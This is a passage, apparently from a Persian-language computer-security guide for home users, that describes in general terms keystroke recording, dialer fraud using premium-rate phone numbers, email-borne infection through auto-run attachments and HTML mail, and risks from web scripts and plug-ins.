‫ﺭﻭﻱ ﺻﻔﺤﺔ ﻭﺏ ﺍﻳﻤﻦ ﻭﺍﺭﺩ ﻛﻨﻴﺪ )ﻳﻌﻨﻲ ﺍﮔﺮ ﻫﻨﮕﺎﻡ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺷـﻮﺩ(‪ ،‬ﺍﻳـﻦ ﺑﺮﻧﺎﻣـﻪ ﺩﻗﻴﻘـﹰﺎ ﺁﻧﭽـﻪ ﻛـﻪ ﺗﺎﻳـﭗ‬
‫ﻣﻲﻛﻨﻴﺪ ﺭﺍ ‪ -‬ﺑﺼﻮﺭﺕ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﺸﺪﻩ ‪ -‬ﺛﺒﺖ ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬
‫ﺳﺮﻗﺖ ﻣﺎﻟﻲ‬
‫ﺩﺭ ﺍﻛﺜﺮ ﺳﺮﻗﺘﻬﺎﻳﻲ ﻛﻪ ﺩﺭﻧﺘﻴﺠﺔ ﺣﻤﻼﺕ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ‬
‫ﺍﺗﻔﺎﻕ ﺍﻓﺘﺎﺩﻩﺍﻧﺪ‪ ،‬ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﻗﺮﺑﺎﻧﻲ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﺻﻮﺭﺕ ﮔﺮﻓﺘﻪ‬
‫ﺍﺳﺖ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﻣﻮﺍﺭﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺳﺮﺑﺎﺭ‪ ،‬ﭘﻮﻝ ﻣﺴﺮﻭﻗﻪ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛـﺎﺭ ﺑـﻪ ﻣـﺼﺮﻑ‬
‫ﺭﺳﻴﺪﻩ ﺍﺳﺖ‪ .‬ﺳﺎﺩﻩﺗﺮﻳﻦ ﻣﺜﺎﻝ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﺮﻧﺎﻣﻪ‪ ،‬ﻳـﻚ ﻣـﻮﺩﻡ‬
‫ﺭﺍ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﺪ ﻭ ﺍﺯ ﺁﻥ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ‬
‫ﺑﺎ ﻣﻘﺎﺻﺪ ﺩﻭﺭﺩﺳﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﺪ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺑﺮﻧﺎﻣﻪ ﻧﻤﻲﺗﻮﺍﻧـﺪ‬
‫ﺻﺤﺒﺖ ﻛﻨﺪ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻢ ﻫﻴﭻ ﻣﺰﻳﺘﻲ ﻧﺪﺍﺭﺩ‪ ،‬ﺑﺠـﺰ‬
‫ﻧﻮﻋﻲ ﺍﺣﺴﺎﺱ ﺭﺿﺎﻳﺖ ﺷﻴﻄﺎﻧﻲ ﻣﺒﻨﻲ ﺑﺮ ﺍﻳﻨﻜﻪ ﺷـﻤﺎ ﺩﺭ ﭘﺎﻳـﺎﻥ‬
‫ﻣﺎﻩ ﻳﻚ ﺻﻮﺭﺗﺤﺴﺎﺏ ﺳـﻨﮕﻴﻦ ﺍﺯ ﺷـﺮﻛﺖ ﻣﺨـﺎﺑﺮﺍﺕ ﺩﺭﻳﺎﻓـﺖ‬
‫ﻣﻲﻛﻨﻴﺪ‪.‬‬
‫ﺩﺭ ﻣﻮﺍﺭﺩ ﺩﻳﮕﺮ ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺑﻬـﺮﺓ ﺷﺨـﺼﻲ‬
‫ﺑﺒﺮﺩ‪ .‬ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎﺭﻩ ﺗﻠﻔـﻦ ﺧﺎﺻـﻲ‬
‫ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﻭﻗﺘﻲ ﺑﺎ ﺁﻥ ﺗﻤﺎﺱ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﺩ ﺷﺮﻛﺖ‬
‫ﻣﺨﺎﺑﺮﺍﺕ ﺩﺭ ﻫﺮ ﺩﻗﻴﻘﻪ ﻫﺰﻳﻨﺔ ﺑﻴﺸﺘﺮﻱ ﺑﺮﺍﻱ ﺗﻤﺎﺱ ﮔﻴﺮﻧﺪﻩ ﺛﺒﺖ‬
‫ﻛﻨﺪ ﻭ ﺩﺭ ﻋﻮﺽ ﻣﻘﺪﺍﺭﻱ ﺍﺯ ﺍﻳﻦ ﻫﺰﻳﻨﻪ ﺑﻪ ﺣﺴﺎﺏ ﻛـﺴﻲ ﺑـﺮﻭﺩ‬
‫ﻛﻪ ﺑﺎ ﺍﻭ ﺗﻤﺎﺱ ﺣﺎﺻﻞ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺍﻣـﺮ ﺩﺭ ﺍﻧـﻮﺍﻉ ﻣﺨﺘﻠـﻒ‬
‫ﻣﻌﺎﻣﻼﺕ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪ ،‬ﺍﻣﺎ ﺑﻴﺸﺘﺮ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﺓ‬
‫ﺷﺮﻛﺘﻬﺎﻱ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﺍﺳﺖ ﻛﻪ ﺧﻮﺍﻫﺎﻥ ﺭﺍﻩ ﺳﺎﺩﻩﺍﻱ ﻫﺴﺘﻨﺪ ﺗـﺎ‬
‫ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺑﺪﻭﻥ ﺿﻤﺎﻧﺖ ﻫﺰﻳﻨﻪﺍﻱ ﺭﺍ ﺍﺯ ﺣﺴﺎﺏ ﺷﻤﺎ ﻛـﺴﺮ‬
‫ﻧﻤﺎﻳﻨــﺪ‪ .‬ﺩﺭ ﭼﻨــﻴﻦ ﻭﺿــﻌﻴﺘﻲ ﺷــﺮﻛﺖ ﻣﺨــﺎﺑﺮﺍﺕ ﻫﺰﻳﻨــﻪﻫــﺎﻱ‬
‫ﺗﻤﺎﺱ ﮔﻴﺮﻧﺪﻩ ﻫﺎ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﻣﺤﺎﺳﺒﻪ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﻗﺴﻤﺘﻲ‬
‫ﺍﺯ ﺁﻧﺮﺍ ﺑﻌﻨﻮﺍﻥ ﻫﺰﻳﻨﺔ ﺗﻤﺎﺳﻬﺎﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺑﻪ ﺷﺮﻛﺘﻲ ﻛـﻪ ﺑـﺎ ﺁﻥ‬
‫ﺗﻤﺎﺱ ﺣﺎﺻﻞ ﺷـﺪﻩ ﺍﺳـﺖ ﺍﺭﺳـﺎﻝ ﻛﻨـﺪ‪ .‬ﺍﮔـﺮ ﻧﻔـﻮﺫﮔﺮ ﭼﻨـﻴﻦ‬
‫ﺷﻤﺎﺭﻩﺍﻱ ﺩﺍﺷﺘﻪﺑﺎﺷﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺭﺍ ﻃﻮﺭﻱ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ‬
‫ﻛﻨﺪ ﻛﻪ ﺑﺎ ﺍﻳﻦ ﺷﻤﺎﺭﻩ ﺗﻤﺎﺱ ﺑﮕﻴـﺮﺩ ﻭ ﺑـﺮﺍﻱ ﻣـﺪﺗﻲ ﺗﻤـﺎﺱ ﺭﺍ‬
‫ﺑﺮﻗﺮﺍﺭ ﻧﮕﻬﺪﺍﺭﺩ‪ .‬ﺩﺭ ﺁﻧﺼﻮﺭﺕ ﺍﻳﻦ ﻫﺰﻳﻨﻪ ﺩﺭ ﺻﻮﺭﺗﺤﺴﺎﺏ ﭘﺎﻳـﺎﻥ‬
‫ﻣﺎﻩ ﺗﻠﻔﻦ ﺷﻤﺎ ﺩﺭﺝ ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬
‫ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﭼﮕﻮﻧﻪ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲﺷﻮﻧﺪ؟‬
‫ﭼﻨﺪ ﺳﺎﻝ ﻗﺒﻞ ﺗﻨﻬﺎ ﺭﺍﻩ ﺁﻟﻮﺩﻩ ﺷﺪﻥ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺑﻮﺳـﻴﻠﺔ‬
‫ﻭﻳﺮﻭﺱ ﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ‪ ،‬ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺩﻳـﺴﻜﻬﺎﻱ ﺁﻟـﻮﺩﻩ‬
‫‪٧٥‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﭼﻨﺪ ﺳﺎﻝ ﻗﺒـﻞ ﻣﻴـﺎﻥ ﻛـﺎﺭﺑﺮﺍﻥ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺷـﺎﻳﻌﺎﺗﻲ‬
‫ﮔﺴﺘﺮﺵ ﻳﺎﻓﺖ ﻣﺒﻨﻲ ﺑﺮ ﺍﻳﻨﻜـﻪ ﺑـﺎ ﺩﺭﻳﺎﻓـﺖ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑـﻪ ﻭﻳـﺮﻭﺱ ﺁﻟـﻮﺩﻩ ﺷـﻮﻳﺪ‪ .‬ﻣـﺪﻳﺮﺍﻥ ﻭ ﻣـﺴﺌﻮﻻﻥ‬
‫ﺳﻴﺴﺘﻢ ﻣﺠﺒﻮﺭ ﺑﻮﺩﻧﺪ ﻣﺪﺍﻭﻣﹰﺎ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺍﻃﻤﻴﻨﺎﻥ ﺩﻫﻨﺪ ﻛﻪ ﺍﻳﻦ‬
‫ﺍﻣﺮ "ﻏﻴﺮ ﻣﻤﻜﻦ" ﺍﺳﺖ‪ ،‬ﻭ ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﻓﺎﻳﻞ ﺿﻤﻴﻤﻪ ﺑـﻪ ﺍﺟـﺮﺍ ﺩﺭ‬
‫ﻧﻴﺎﻳﺪ‪ ،‬ﻣﺎﺷﻴﻦ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺁﻥ ﺩﺭ ﺍﻣﻨﻴﺖ ﻛﺎﻣﻞ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﺁﻟﻮﺩﻩ ﺷﺪﻥ ﺍﺯ ﻃﺮﻳﻖ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻣﺮﻭﺯ ﺩﻳﮕﺮ ﺍﻣـﺮ ﻣﺤـﺎﻟﻲ‬
‫ﻧﻴﺴﺖ ﻭ ﺩﺭﻭﺍﻗﻊ ﺑﺴﻴﺎﺭ ﻫﻢ ﻣﺤﺘﻤﻞ ﺍﺳﺖ‪ .‬ﺩﻭ ﻗﺎﺑﻠﻴﺖ ﺍﺿﺎﻓﻪﺷﺪﻩ‬
‫ﺑﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻋﺚ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﺍﻭﻟﻴﻦ ﺗﻐﻴﻴﺮ ﺍﻳﻦ ﺍﺳﺖ ﻛـﻪ ﺍﻣـﺮﻭﺯﻩ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻳﻲ ﺑـﺮﺍﻱ ﭘـﺴﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﻣـﻲ ﺗﻮﺍﻧﻨـﺪ ﺿـﻤﺎﻳﻢ ﺭﺍ ﺑـﺼﻮﺭﺕ‬
‫ﺧﻮﺩﻛﺎﺭ ﺍﺟﺮﺍ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺩﺭ ﮔﺬﺷﺘﻪ ﻛﺎﺭﺑﺮ ﻓﺎﻳﻞ ﺿﻤﻴﻤﻪ ﺭﺍ ﺫﺧﻴـﺮﻩ ﻭ‬
‫ﺳﭙﺲ ﺁﻧﺮﺍ ﺍﺟﺮﺍ ﻣﻲﻛـﺮﺩ‪ ،‬ﺍﻣـﺎ ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﺍﺟـﺮﺍﻱ ﺧﻮﺩﻛـﺎﺭ‬
‫ﺿــﻤﺎﺋﻢ ﻛﺎﺭﻫــﺎ ﺭﺍ ‪ -‬ﻣﺨــﺼﻮﺻﹰﺎ ﺑــﺮﺍﻱ ﻛــﺎﺭﺑﺮﺍﻥ ﻣﺒﺘــﺪﻱ ﻛــﻪ‬
‫ﻣﻲﺧﻮﺍﻫﻨﺪ ﺑﺪﻭﻥ ﺍﻧﺠﺎﻡ ﻋﻤﻠﻴﺎﺕ ﺍﺿﺎﻓﻪ ﺁﻧﭽﻪ ﻛﻪ ﻓﺮﺳﺘﺎﺩﻩ ﺷـﺪﻩ‬
‫ﺍﺳﺖ ﺭﺍ ﺑﺒﻴﻨﻨﺪ ‪ -‬ﺳﺎﺩﻩﺗﺮ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻳﻨﭽﻨﻴﻨـﻲ‬
‫ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﻨﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺴﻴﺎﺭ ﺧـﻼﻕ ﺑﺎﺷـﻨﺪ‪ .‬ﺍﺧﻴـﺮﹰﺍ ﺗﻌـﺪﺍﺩﻱ‬
‫ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺁﻟﻮﺩﻩ ﺑﻪ ﻭﻳﺮﻭﺱ ﻣﻨﺘﺸﺮ ﺷﺪ ﻛﻪ ﺍﺩﻋﺎ ﻣﻲﻛـﺮﺩ‬
‫ﺍﺯ ﻃﺮﻑ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺍﺳﺖ ﻭ ﺣﺎﻭﻱ ﺁﺧﺮﻳﻦ ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‬
‫ﻣﻲﺑﺎﺷﺪ ﻛـﻪ ﺩﺭ ﺑﺮﺍﺑـﺮ ﻭﻳﺮﻭﺳـﻬﺎ ﻭ ﻛﺮﻣﻬـﺎ ﺍﺯ ﺷـﻤﺎ ﻣﺤﺎﻓﻈـﺖ‬
‫ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﺍﻳﻦ ﻧﺎﻣﻪﻫﺎ ﺷﺎﻣﻞ ﺗـﺼﺎﻭﻳﺮ ﻭ ﻧﻤﺎﺩﻫـﺎﻳﻲ ﻫـﺴﺘﻨﺪ ﻛـﻪ‬
‫ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻭ ﻣﻌﺘﺒﺮ ﺑﻨﻈﺮ ﻣﻲﺭﺳـﻨﺪ ﻭ ﻟـﺬﺍ ﻛـﺎﺭﺑﺮ ﺭﺍ ﻣﺘﻘﺎﻋـﺪ‬
‫ﻣﻲﺳﺎﺯﻧﺪ ﻛﻪ ﺿﻤﺎﻳﻢ ﺑﺎﻳﺪ ﺑﻪ ﺳﺮﻋﺖ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺑﻴﺎﻳﻨـﺪ‪ .‬ﻭﺍﺿـﺢ‬
‫ﺍﺳﺖ ﻛﻪ ﺍﮔﺮ ﻛﺴﻲ ﺿﻤﻴﻤﻪﻫﺎ ﺭﺍ ﺍﺟﺮﺍ ﻛﻨـﺪ ﺩﭼـﺎﺭ ﺩﺭﺩﺳـﺮﻫﺎﻱ‬
‫ﺍﺳﺎﺳﻲ ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬
‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ‬
‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﺷﺒﻜﺔ ﮔﺴﺘﺮﺩﺓ ﺟﻬـﺎﻧﻲ‪ ٥٦‬ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ ﺷـﺪ ﺻـﻔﺤﺎﺕ‬
‫ﻭﺑﻲ ﺍﻳﺠﺎﺩ ﺷﺪﻧﺪ ﻛﻪ ﺷﺎﻣﻞ ﻣﺘﻨﻬﺎ ﻭ ﺗﺼﺎﻭﻳﺮ ﺑﻮﺩﻧﺪ‪ .‬ﺍﻛﻨـﻮﻥ ﺍﻳـﻦ‬
‫ﺻﻔﺤﺎﺕ ﺷﺎﻣﻞ ﻣﺤﺘﻮﻳﺎﺕ ﺑﻴﺸﺘﺮﻱ ﻫﺴﺘﻨﺪ‪ ،‬ﻣﺜـﻞ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ‬
‫ﭘﻮﻳــﺎﻳﻲ ﻛــﻪ ﺭﻭﻱ ﻣﺎﺷــﻴﻦ ﺷــﻤﺎ ‪ download‬ﺷــﺪﻩ ﻭ ﺍﺟــﺮﺍ‬
‫ﻣﻲ ﮔﺮﺩﻧﺪ )‪ ،Java ،Javascript‬ﻭ ‪ .(ActiveX‬ﺍﮔﺮ ﺑﻪ ﻣﺮﻭﺭﮔﺮ ﺧﻮﺩ‬
‫ﺍﺟﺎﺯﻩ ﺩﻫﻴﺪ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫـﺎ ﺭﺍ ﺑـﺪﻭﻥ ﺑﺮﺭﺳـﻲ ﻗﺎﺑﻠﻴـﺖ ﺍﻃﻤﻴﻨـﺎﻥ‬
‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﻮﺭﺩ ﻧﻈﺮ ﺍﺟﺮﺍ ﻛﻨﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺧﻲ ﺍﺯ ﻣـﻮﺍﺭﺩ ﺭﺍ‬
‫ﺑﺮﺧﻼﻑ ﺁﻧﭽﻪ ﻛﻪ ﺑﺎﻳﺪ‪ ،‬ﺍﺟﺮﺍ ﻧﻤﺎﻳﺪ‪ .‬ﺑﺮﻧﺎﻣﺔ ‪ Javascript‬ﺑﻄـﻮﺭ‬
‫ﻛﻠﻲ ﺍﻳﻤﻦ ﺍﺳـﺖ‪ ،‬ﺍﻣـﺎ ‪ Java‬ﻭ ‪ ActiveX‬ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺴﻴﺎﺭ‬
‫ﻻ ﻣﻲﺗﻮﺍﻥ ﻣﺮﻭﺭﮔﺮﻫـﺎ ﺭﺍ ﻃـﻮﺭﻱ ﺗﻨﻈـﻴﻢ‬
‫ﺧﻄﺮﻧﺎﻙ ﺑﺎﺷﻨﺪ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﻛﺮﺩ ﻛﻪ ﺑﻪ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﺟﺎﺯﻩ ﺍﺟﺮﺍ ﻧﺪﻫﻨﺪ ﻭ ﻳﺎ ﻗﺒـﻞ ﺍﺯ ﺍﺟـﺮﺍﻱ‬
‫ﺁﻧﻬﺎ ﺍﺯ ﻛﺎﺭﺑﺮ ﺍﺟﺎﺯﻩ ﺑﮕﻴﺮﻧﺪ‪.‬‬
‫‪Plug-in‬ﻫﺎ ﻭ ‪Add-on‬ﻫﺎ‬
‫ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﻭﺏ ﻭ ﺑﺴﻴﺎﺭﻱ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﺩﻳﮕﺮ )ﻣﺜﻞ ﭘﺮﺩﺍﺯﺷﮕﺮﻫﺎﻱ‬
‫ﻛﻠﻤﻪ‪ ٥٧‬ﻭ ﺻﻔﺤﺎﺕ ﮔﺴﺘﺮﺩﻩ‪ (٥٨‬ﺑﻪ ﺑﺮﺧﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﺟﺎﺯﺓ ﺍﺟﺮﺍ ﺷﺪﻥ‬
‫‪World-Wide Web‬‬
‫‪Word Processors‬‬
‫‪Spreadsheets‬‬
‫‪56‬‬
‫‪57‬‬
‫‪58‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫ﺑﻮﺩ ﻭ ﺍﮔﺮ ﺑﺎ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺁﻟﻮﺩﻩ ﺷﺪﻩ ﺑﻮﺩﻧـﺪ ﺗﺒـﺎﺩﻝ ﻓﺎﻳـﻞ ﺍﻧﺠـﺎﻡ‬
‫ﻧﻤﻲﺩﺍﺩﻳﺪ ﺩﺭ ﺍﻣﻨﻴﺖ ﺑـﻪ ﺳـﺮ ﻣـﻲﺑﺮﺩﻳـﺪ‪ .‬ﺳﻴـﺴﺘﻤﻬﺎﻱ ‪UNIX‬‬
‫ﭼﻨﺪﺍﻥ ﻣﺴﺘﻌﺪ ﺩﺭﻳﺎﻓﺖ ﻭﻳﺮﻭﺱ ﻧﺒﻮﺩﻧﺪ ﺍﻣﺎ ﺑﻪ ﺩﻟﻴـﻞ ﻗﺎﺑﻠﻴﺘﻬـﺎﻱ‬
‫ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒـﺎﻁ ﻭ ﻫﻤﭽﻨـﻴﻦ ﺍﺷـﻜﺎﻻﺕ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﺑﺮﺧﻲ ﺍﺯ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍﻳﺞ‪ ،‬ﺣﺘﻲ ﺩﺭ‬
‫ﺁﻥ ﺭﻭﺯﻫﺎ ﻫﻢ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻧﻔﻮﺫﮔﺮﺍﻥ ﻣﻲﺗﻮﺍﻧﺴﺘﻨﺪ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ‬
‫ﺩﺳﺘﻴﺎﺑﻲ ﭘﻴﺪﺍ ﻛﻨﻨﺪ ﻭ ﺭﻭﻱ ﺁﻧﻬﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺩﺭﺏ ﻣﺨﻔﻲ ﻧﺼﺐ‬
‫ﻧﻤﺎﻳﻨﺪ‪ .‬ﺍﻭﻟﻴﻦ ﺣﺎﺩﺛﺔ ﺟﺪﻱ ﺍﻣﻨﻴﺘﻲ ﺍﻳﻨﺘﺮﻧﺖ ﻛﺮﻣـﻲ ﺑـﻮﺩ ﻛـﻪ ﺩﺭ‬
‫ﺳﺎﻝ ‪ ۱۹۸۸‬ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ‪ UNIX‬ﺣﻤﻠﻪ ﻛﺮﺩ‪ .‬ﺍﻣـﺮﻭﺯ ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﺷﻤﺎ ﺑﻪ ﺭﻭﺷـﻬﺎﻱ ﻣﺘﻔـﺎﻭﺗﻲ ﻣـﻮﺭﺩ ﺣﻤﻠـﻪ ﻗـﺮﺍﺭ ﺑﮕﻴﺮﻳـﺪ‪.‬‬
‫ﺭﻭﺷﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺍﺩﺍﻣﻪ ﺫﻛﺮ ﺷـﺪﻩﺍﻧـﺪ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﻣﺒﺘﻨﻲ ﺑﺮ ‪ Windows‬ﻣﻲ ﺷﻮﻧﺪ‪ .‬ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Macintosh‬ﻭ‬
‫‪ Unix‬ﺑﻪ ﻧﻮﻋﻲ ﻧﺴﺒﺖ ﺑﻪ ﺍﻳﻦ ﺣﻤﻠﻪﻫﺎ ﻛﻤﺘـﺮ ﻣـﺴﺘﻌﺪ ﻫـﺴﺘﻨﺪ؛‬
‫ﺍﻟﺒﺘﻪ ﻧﻪ ﺍﻟﺰﺍﻣﹰﺎ ﺑﻪ ﺍﻳﻦ ﻋﻠﺖ ﻛﻪ ﺍﻳﻤﻦﺗﺮ ﻫـﺴﺘﻨﺪ‪ ،‬ﺑﻠﻜـﻪ ﺑـﻪ ﺍﻳـﻦ‬
‫ﻻ ﺳﻴـﺴﺘﻤﻬﺎﻱ ‪ Windows‬ﺑـﺮﺍﻱ ﻣﻬـﺎﺟﻤﻴﻦ‬
‫ﺩﻟﻴﻞ ﻛﻪ ﻣﻌﻤـﻮ ﹰ‬
‫ﺍﻫﺪﺍﻑ ﺟﺬﺍﺏﺗﺮﻱ ﺑﻪ ﺷﻤﺎﺭ ﻣﻲﺭﻭﻧﺪ‪ .‬ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Unix‬ﺩﺭ ﺭﺩﺓ‬
‫ﺑﻌﺪﻱ ﻗﺮﺍﺭ ﺩﺍﺭﻧـﺪ ﻭ ﺳﻴـﺴﺘﻤﻬﺎﻱ ‪ Macintosh‬ﺗـﺎ ﺑـﻪ ﺍﻣـﺮﻭﺯ‬
‫ﻛﻤﺘﺮﻳﻦ ﺻﺪﻣﻪ ﺭﺍ ﺍﺯ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺧﻮﺩ ﺩﻳﺪﻩﺍﻧﺪ‪.‬‬
‫ﺩﻭﻣﻴﻦ ﺗﻐﻴﻴﺮ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﭼـﻮﻥ ﺗـﻼﺵ ﺑـﺮ ﺍﻳـﻦ ﺑـﻮﺩﻩ ﻛـﻪ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺳﺎﺩﻩ ﻭ ﻗﻮﻱﺗﺮ ﮔﺮﺩﺩ‪ ،‬ﺍﻣﺮﻭﺯ ﺍﻣﻜـﺎﻥ‬
‫ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ‪ HTML‬ﺩﺭ ﺑﺪﻧﺔ ﺍﺻﻠﻲ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭﺟـﻮﺩ‬
‫ﺩﺍﺭﺩ؛ ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ‪ HTML‬ﻣﻲﺗﻮﺍﻧﺪ ﺣـﺎﻭﻱ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ‬
‫ﻣﺸﻜﻠﺴﺎﺯ ﺑﺎﺷﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ‪ HTML‬ﻣﻲﺗﻮﺍﻧﺪ ﻣﺮﻭﺭﮔـﺮ ﻭﺏ ﺭﺍ‬
‫ﺏ ﺍﺯ ﭘﻴﺶ ﺗﻌﻴـﻴﻦﺷـﺪﻩ‬
‫ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺑﻪ ﺳﻤﺖ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭ ﹺ‬
